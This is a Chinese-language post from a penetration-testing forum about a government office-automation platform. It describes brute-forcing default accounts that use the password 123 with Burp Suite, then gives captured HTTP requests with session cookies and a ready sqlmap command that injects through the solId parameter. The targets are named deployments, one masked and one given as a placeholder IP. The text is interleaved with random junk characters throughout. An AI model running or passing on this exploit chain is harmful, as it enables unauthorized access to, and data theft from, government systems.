9 c6 s& m" g5 l
平台简介: Q) k1 A' { i) K; n5 Z1 R) f
( i! z3 l3 M9 f: W1 R+ |) V3 J. j
* N) g* I X7 W- ^, L0 B& i9 P$ B
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
" B4 U" o8 s3 H' H% i3 J
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
: }0 W5 ~% @. X; x9 D% n" W
1 f$ V; i3 i( [' m 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:2 g' d" b' n1 p$ J
8 Z6 J4 t) W; }7 D9 t0 o, p7 R" ~
' z. s: Z8 I: Q9 N# C; z http://1.1.1.1:7197/cap-aco/#(案例2-)
9 m$ k+ E6 j) h3 J+ s( Qhttp://www.XXOO.com (案例1-官网网站)
7 Z3 K. g+ y0 Q: O
3 p% L+ _" G2 p+ j7 W漏洞详情:
- u; |/ s. p# W$ ^9 s' Z% J b% }) D/ g r$ S 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
# r3 w) ?' h* S: u+ w. w首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
. t) O5 F: _0 T8 J/ i# O2 s1 ` Y7 H4 f$ v
1 P8 a+ z* H4 I; K status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
7 ]9 o( N& K6 y3 D' M+ L5 | Y 1、案例1-官方网站+ l- b$ |& e( @# R Q
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
Host: www.XXOO.com$ z) N/ V; h; z* t+ W" {/ B& w
' [2 s' p) Q: s Proxy-Connection: Keep-Alive! Y6 h/ h6 W/ A/ `: Y9 v
, J4 m- w. y' Z7 m, }6 G$ X8 Z( Q( Y$ v) b Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN
* ~; c+ h: I' ~: [* X5 b" y* g% ~3 q; }: F' n0 a Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
0 I. M6 E( Y) p* ]) D1 {' n+ M+ }@5 I# c& G. S& E5 m X-Requested-With: XMLHttpRequest
4 @ s" K2 J( [" c: E: P" XReferer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 O* e& U" x: Z, w v/ h
: R2 O/ K) i/ f1 U# g Accept-Encoding: gzip, deflate, sdch
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e: q3 k& y D5 i3 E' \% D
, g3 O, M3 X+ I9 \将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
. h# d L; \4 s0 p* z
; N- D+ b8 c- C+ K- k4 D) q
8 o! R2 m! I$ Y: \ / s8 x1 B7 d; m/ V
, I7 T. A* I9 O+ a9 N/ \7 @6 u) x' j
0 ~, n! E8 X2 G# _3 b0 | _0 {( z& V( c" w) S, F" F2 r
2、案例2-某天河云平台6 b4 z' x2 p0 Q6 R
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.12 h. A/ O) b& I2 d
+ d8 I* j7 b4 Z. Q7 U- P6 mHost: 1.1.1.:7197. U2 ?( x; g, y* v k7 A
Accept: application/json, text/javascript, */*; q=0.01! d) Q8 }4 [4 g1 h: l4 \0 L" G2 n1 [
- G/ N: R! V5 P# f1 a& b) Z6 }/ T8 I: ]3 ^2 c C X-Requested-With: XMLHttpRequest
, W P2 H3 r( b4 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/json
: r3 P; w& x# J Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
5 k) z X# D+ N4 V' s9 a2 p& \7 R8 W1 Z% Z2 n- A. v/ Y; s Accept-Language: zh-CN,zh;q=0.8
7 u3 Y" f# V3 XCookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1( {5 c. d: k; U( B
Connection: close9 r% s) i- `' h6 r/ n( i, U9 T% p
1 h: [! [# a3 j( d9 B将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
4 V; _8 P0 i/ J6 U7 I, J T9 R
; C8 M; A2 T8 A
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |